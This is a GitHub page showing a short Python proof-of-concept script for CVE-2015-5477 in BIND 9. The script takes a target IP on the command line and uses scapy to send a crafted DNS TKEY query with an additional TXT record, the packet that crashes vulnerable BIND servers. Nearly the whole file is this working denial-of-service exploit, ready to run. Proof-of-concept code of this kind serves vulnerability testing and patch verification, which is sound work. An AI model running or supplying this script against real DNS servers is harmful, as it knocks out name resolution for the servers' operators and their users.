-
Notifications
You must be signed in to change notification settings - Fork 124
/
Copy pathpoc_cve-2015-5477.py
39 lines (32 loc) · 1.14 KB
/
poc_cve-2015-5477.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : [email protected] <github.com/tintinweb>
import sys
from scapy.all import *
def main():
if len(sys.argv)<=1:
print """
USAGE: %s <target.ip> [qname=.]
"""%(sys.argv[0])
sys.exit(1)
target = sys.argv[1]
qname = sys.argv[2] if len([a for a in sys.argv if a=="--debug"])>2 else "."
debug = True if "--debug" in sys.argv else False
conf.verb = debug
print "[ ] CVE-2015-5477 BIND 9 PoC"
print "[i] target: %s"%target
print " [+] sending DNSQ TKEY with additional record ..."
# scapy messes up additional records when put into DNS(ar=..)
p = DNS(rd=1, qd=DNSQR(qname=qname,
qtype=0xf9 , # TKEY
qclass='ANY' ), arcount=1) / DNSRR(rrname=qname,
type='TXT',
rclass='ANY',
rdata="x")
if debug:
p.show()
send(IP(dst=target)/UDP()/p)
print " [!] pkt sent!"
sys.exit(0)
if __name__=='__main__':
main()